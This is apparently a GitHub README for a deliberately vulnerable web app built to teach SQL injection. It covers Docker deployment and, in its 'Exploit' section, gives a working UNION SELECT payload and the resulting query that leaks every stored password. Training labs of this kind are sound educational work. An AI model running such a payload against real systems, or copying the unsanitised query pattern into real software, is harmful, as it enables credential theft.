Skip to content
master
Switch branches/tags
Go to file
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

SQLi Platform

This is a vulnerable WEB application in order to understand SQL injections basics.

The front end exposes a field allowing the user to search a database and retrieve names, nicknames, mails... The user's inputs are not sanitized, allowing an attacker to inject SQL code and leak passwords.

SQL queries are logged on the backend and are also shown on the front, so that the attacker has a better understanding of what he is doing.

Screenshot

Deploy

You may run the application under Docker containers:

docker-compose up

You way edit docker-compose.yml in order to tweak the following settings :

  • MYSQL_ROOT_PASSWORD Databse password
  • SQL_HOST Database host, from the API point of view
  • SQL_WAIT API waiting for that time (in seconds) before connecting to the database

The application is then accessible on http://localhost:8080/.

Exploit

⚠️ Contains spoilers !
Here is an example of a working payload, exposing all passwords in the table:

nothing%" UNION SELECT pass, nickname, email FROM users#

Resulting in the following complete query:

SELECT id, nickname, email FROM users WHERE nickname LIKE "%nothing%" UNION SELECT pass, nickname, email FROM users#%"

About

Training for SQL injections

Resources

Releases

No releases published

Packages

No packages published